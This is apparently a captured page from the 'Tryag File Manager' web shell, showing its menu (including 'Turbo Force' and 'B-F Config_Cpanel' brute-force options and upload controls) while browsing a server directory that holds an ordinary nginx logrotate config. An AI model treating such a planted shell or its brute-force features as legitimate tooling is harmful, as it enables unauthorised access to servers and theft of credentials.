Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
home
/
yanggyein
/
kku
/
laradock
/
nginx
/
logrotate
/
Or
Select Your Path :
Upload File :
New :
File
Dir
/home/yanggyein/kku/laradock/nginx/logrotate/nginx
/var/log/nginx/*.log { daily missingok rotate 32 compress delaycompress nodateext notifempty create 644 www-data root sharedscripts postrotate [ -f /var/run/nginx.pid ] && kill -USR1 `cat /var/run/nginx.pid` endscript }